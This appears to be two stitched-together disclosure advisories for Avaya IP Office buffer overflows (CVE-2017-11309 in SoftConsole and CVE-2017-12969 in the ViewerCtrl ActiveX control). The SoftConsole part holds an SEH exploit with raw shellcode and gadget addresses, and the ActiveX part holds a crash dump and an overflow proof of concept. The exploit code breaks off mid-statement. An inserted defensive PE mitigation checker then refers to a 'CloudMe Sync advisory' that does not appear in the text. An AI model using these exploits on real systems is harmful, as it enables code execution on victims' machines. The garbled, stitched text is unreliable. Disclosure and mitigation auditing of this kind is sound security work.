IP Office is Avaya's global midsize solution for enterprises, supporting up to 3,000 users at a single location with IP Office Select editions. For businesses with multiple locations, IP Office provides a powerful set of tools to help streamline operations, centralize management, and reduce total cost of ownership for converged networks. Using industry standards, IP Office enables companies to share resources, provide improved customer service, and keep mobile employees accessible. Provides a hybrid PBX with TDM and IP telephony and trunk support. Provides IP routing, switching and firewall protection, between LAN and WAN (LAN2). In addition to basic telephony services and voicemail, IP Office offers both hard phone and soft phone options. Includes a robust set of tools for administration (Manager), call tracking (SMDR), and system monitoring and diagnostics (System Status Application). Available editions: Basic, Essential, Preferred, Server, Server Select, Server with Virtualized Software, Server/Server Select hosted in the Cloud.

Vulnerability Type:
Remote Buffer Overflow

CVE Reference:
CVE-2017-11309
ASA-2017-307

Security Issue:
SoftConsole.exe does not check bounds when reading the server response on making an outbound connection, resulting in a classic Buffer Overflow exploit. An Avaya IP Office user must connect to a malicious server, where a remote attacker can then deliver the buffer overflow payload in the server response, exploiting the SoftConsole client. This vulnerability allows attackers to deliver and execute arbitrary attacker supplied code on the Avaya host system.
References:
https://downloads.avaya.com/css/P8/documents/101044086

POC Video URL:
https://vimeo.com/224679849

Exploit/POC:

import struct,socket

#Log data, item 8
# Address=50E083A1
# Message= 0x50e083a1 : pop ecx # pop ebp # ret 0x04 | {PAGE_EXECUTE_READ} [IndyCore190.bpl]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v19.0.14356.6604
#(C:\Program Files (x86)\Avaya\IP Office\SoftConsole\IndyCore190.bpl)
#50E083A1
#POP ECX POP EBP RET

''' No SafeSEH '''

HOST="127.0.0.1"
PORT=80

#shellcode to call wusa.exe Windows Update Standalone Installer (Tested Win 7)
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x6E\x08"
"\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B\x4B\x18\x8B\x7B"
"\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31\xC0\x99\x32\x17\x66\xC1"
"\xCA\x01\xAE\x75\xF7\x66\x81\xFA\x10\xF5\xE0\xE2\x75\xCF\x8B\x53"
"\x24\x01\xEA\x0F\xB7\x14\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68"
"\x2E\x65\x78\x65\x68\x77\x75\x73\x61\x54\x87\x04\x24\x50\xFF\xD5"
"\xCC")

'''
calculated by taking the negative of the number and convert to hex:
in gdb
1 2 p/x -1116
$4 = 0xfba4
So now we know that our near jump is going to be \xe9\xa4\xfb\xff\xff.
'''

seh=struct.pack("
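Both the CloudMe Sync advisory and this SoftConsole advisory rest on the same observation: the modules the exploits return into were linked without ASLR and SafeSEH, so one SEH-overwrite address works on every install. The following is an added audit example, not code from either advisory or from mona: it reads the PE optional header's DllCharacteristics to report ASLR (IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE), DEP (NX_COMPAT), CFG (GUARD_CF) and high-entropy ASLR, and checks whether a 32-bit image carries a Load Config directory at all, which SafeSEH's handler table requires. The sample images are constructed header-only PE32 stubs (they are not loadable); a real file is passed on the command line. The `safeseh_possible` field is my name and is deliberately conservative: no Load Config directory means SafeSEH is certainly absent, while a present one still needs its SEHandlerCount read to confirm.

```python
"""Report exploit-mitigation flags of a PE image from its headers (added example)."""
import struct
import sys

IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA = 0x0020
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040    # ASLR opt-in
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100       # DEP opt-in
IMAGE_DLLCHARACTERISTICS_GUARD_CF = 0x4000        # Control Flow Guard
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG = 10            # holds SafeSEH's handler table on x86


def pe_mitigations(data):
    """Parse DOS header -> PE signature -> COFF -> optional header and return a
    dict of mitigation flags. Raises ValueError on a non-PE input."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    opt = coff + 20                                  # IMAGE_FILE_HEADER is 20 bytes
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:                               # PE32
        pe32plus, dirs_off = False, 96
    elif magic == 0x20B:                             # PE32+
        pe32plus, dirs_off = True, 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in both formats
    n_dirs = struct.unpack_from("<I", data, opt + dirs_off - 4)[0]
    load_cfg_size = 0
    if n_dirs > IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG:
        _rva, load_cfg_size = struct.unpack_from(
            "<II", data, opt + dirs_off + 8 * IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG)
    return {
        "pe32plus": pe32plus,
        "aslr": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "dep": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "cfg": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_GUARD_CF),
        "high_entropy_va": pe32plus and bool(dll_chars & IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA),
        # SafeSEH is x86-only and lives in the Load Config directory; absent directory => no SafeSEH.
        "safeseh_possible": (not pe32plus) and load_cfg_size > 0,
    }


def missing_mitigations(data):
    """Names of the mitigations an SEH-overwrite exploit would like to see absent."""
    r = pe_mitigations(data)
    checks = [("aslr", r["aslr"]), ("dep", r["dep"]),
              ("safeseh", r["pe32plus"] or r["safeseh_possible"]), ("cfg", r["cfg"])]
    return [name for name, present in checks if not present]


def build_sample_pe32(dll_characteristics, load_config_size):
    """Constructed minimal PE32 header (no sections, not loadable) for the demo."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x2102)  # i386, 224-byte opt hdr, DLL
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                       # PE32 magic
    struct.pack_into("<H", opt, 70, dll_characteristics)
    struct.pack_into("<I", opt, 92, 16)                         # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG,
                     0x1000 if load_config_size else 0, load_config_size)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


# Like the modules in the advisories' listings: nothing enabled.
UNPROTECTED = build_sample_pe32(0, 0)
# Linked with /DYNAMICBASE /NXCOMPAT and a load-config directory.
HARDENED = build_sample_pe32(IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE | IMAGE_DLLCHARACTERISTICS_NX_COMPAT, 0x40)

if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, "missing:", missing_mitigations(fh.read()))
    if len(sys.argv) == 1:
        print("unprotected sample missing:", missing_mitigations(UNPROTECTED))
        print("hardened sample missing:   ", missing_mitigations(HARDENED))
```

Run it over every DLL and EXE in an application directory: any module that comes back with `aslr` and `safeseh` missing is a fixed-address, unprotected-handler candidate of exactly the kind the two listings above show, and the vendor fix to ask for is a relink with the mitigations enabled, independent of the specific overflow.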
[FD] CVE-2017-12969 Avaya OfficeScan IPO Remote ActiveX Buffer Overflow
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AVAYA-OFFICE-IP-(IPO)-v9.1.0-10.1-VIEWERCTRL-ACTIVE-X-BUFFER-OVERFLOW-0DAY.txt
[+] ISR: ApparitionSec

Vendor:
www.avaya.com

Product:
Avaya IP Office (IPO) v9.1.0 - 10.1

IP Office is Avaya's global midsize solution for enterprises, supporting up to 3,000 users at a single location with IP Office Select editions. For businesses with multiple locations, IP Office provides a powerful set of tools to help streamline operations, centralize management, and reduce total cost of ownership for converged networks. Using industry standards, IP Office enables companies to share resources, provide improved customer service, and keep mobile employees accessible. Provides a hybrid PBX with TDM and IP telephony and trunk support. Provides IP routing, switching and firewall protection, between LAN and WAN (LAN2). In addition to basic telephony services and voicemail, IP Office offers both hard phone and soft phone options. Includes a robust set of tools for administration (Manager), call tracking (SMDR), and system monitoring and diagnostics (System Status Application). Available editions: Basic, Essential, Preferred, Server, Server Select, Server with Virtualized Software, Server/Server Select hosted in the Cloud.

Vulnerability Type:
ActiveX Remote Buffer Overflow

CVE Reference:
CVE-2017-12969
ASA-2017-313

Security Issue:
The ViewerCtrl.ocx ActiveX component used by Avaya IP Office (IPO) can be exploited by remote attackers to potentially execute arbitrary attacker supplied code. The user would have to visit a malicious webpage using Internet Explorer, where the exploit could be triggered.
Clsid: {27F12EFD-325D-4907-A2D2-C38A2B6D3334}
Safe for Script: False
Safe for Init: False

ACCESS_VIOLATION
8C4A77 MOV EAX,[ECX]

SEH Chain:
1 8D00A3 po.dll
2 36A7E95 CIPElements.dll
3 36A8115 CIPElements.dll
4 788719 ViewerCtrl.OCX
5 788533 ViewerCtrl.OCX
6 78862A ViewerCtrl.OCX
7 6008793E mfc90u.dll
8 60089B31 mfc90u.dll
9 779858C5 ntdll.dll

(d360.1040c): Access violation - code c005 (first/second chance not available)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for po.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for CIPElements.dll -
eax=0608ec18 ebx= ecx= edx= esi=0aa7bdd0 edi=0aa7bdd0
eip=06064a77 esp=03535c78 ebp=03535db0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246
po!cip::po::SpecialObjects::getPresetObject+0x77:
06064a77 8b01 mov eax,dword ptr [ecx] ds:002b:=

0:008> !load winext/msec
0:008> !exploitable
!exploitable 1.6.0.0
*** ERROR: Module load completed but symbols could not be loaded for mfc90u.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for mshtml.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for user32.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for ieframe.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for iertutil.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for IEShims.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for kernel32.dll -
Exploitability Classification: PROBABLY_EXPLOITABLE
Recommended Bug Title: Probably Exploitable - Data from Faulting Address controls Code Flow starting at po!cip::po::SpecialObjects::getPresetObject+0x0077 (Hash=0x6f1f914b.0xc46b7285)

The data from the faulting address is later used as the target for a branch.
References:
https://downloads.avaya.com/css/P8/documents/101044091

Exploit/POC:

victimFile = "C:\Program Files (x86)\Avaya\IP Office Contact Center\User Interface\ViewerCtrl.ocx"
prototype = "Function open ( ByVal containerId As String ) As Long"
memberName = "open"
progid = "ViewerCtrlLib.ViewerCtrl"
argCount = 1

payload=String(5142, "A")
victim.open payload

Network Access:
Remote

Severity:
High

Disclosure Timeline:
Vendor Notification: July 12, 2017
Vendor acknowledgement: July 14, 2017
CVE assigned by mitre : August 19, 2017
Vendor advisory : November 4, 2017
November 5, 2017 : Public Disclosure